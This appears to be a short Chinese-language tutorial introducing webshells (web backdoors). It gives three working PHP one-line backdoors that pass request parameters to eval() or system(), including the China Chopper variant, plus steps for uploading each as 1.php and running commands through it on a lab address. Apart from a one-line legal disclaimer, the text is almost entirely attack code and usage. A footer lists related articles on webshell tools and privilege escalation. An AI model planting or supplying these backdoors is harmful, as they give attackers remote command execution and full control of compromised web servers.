32、webshell简介

简介: 32、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。


一、eval,使用PHP函数,例如phpinfo()


1、把下面内容写入1.php文件

<?php eval($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=phpinfo();

0a2653c851af460fa595bd959398a8f1.png

二、system,使用系统命令,例如:dir(win),ls(linux)


1、把下面内容写入1.php文件

<?php system($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=dir;

0eacb84100b54626af849e6b562bf92a.png

三、菜刀一句话


1、把下面内容写入1.php文件

<?php @eval($_POST['abc']);?>

2、在菜刀添加该文件路径,点击添加

2d65d23f6d4748949b924e4057485923.png

3、双击网址进入

4cebaac233b3433da32a72337a77fc60.png

6de278e6d6694ce5bb08e7e842b7e74b.png

禁止非法,后果自负

目录
相关文章
|
8月前
|
安全 PHP 数据库
【PHP开发专栏】PHP文件包含漏洞与防范
【4月更文挑战第30天】本文探讨了PHP文件包含漏洞,该漏洞让攻击者能执行恶意代码或访问敏感信息。文章分为三部分:原理、影响和防范。文件包含函数(如`include`和`require`)在攻击者控制文件名时可能导致漏洞。影响包括执行恶意代码、泄露敏感信息和影响服务器性能。防范措施包括验证文件名安全性、使用安全包含函数、设置安全包含路径和参数,以及定期更新和维护代码及库。开发者应重视此问题,采取相应措施保障应用安全。
152 0
|
8月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
108 3
|
8月前
【文字版】WebShell -- 开启3389服务
【文字版】WebShell -- 开启3389服务
58 0
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
338 0
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
656 0
|
安全 Java 网络安全
23个常见Webshell网站管理工具
23个常见Webshell网站管理工具
921 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
240 0
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
121 0
32、webshell简介
|
开发框架 安全 Java
某教程学习笔记(一):13、脚本木马原理
某教程学习笔记(一):13、脚本木马原理
111 0
某教程学习笔记(一):13、脚本木马原理
|
机器学习/深度学习 前端开发 NoSQL
基于机器学习的PHP-WebShell扫描工具(附完整代码)
基于机器学习的PHP-WebShell扫描工具(附完整代码)
177 0
基于机器学习的PHP-WebShell扫描工具(附完整代码)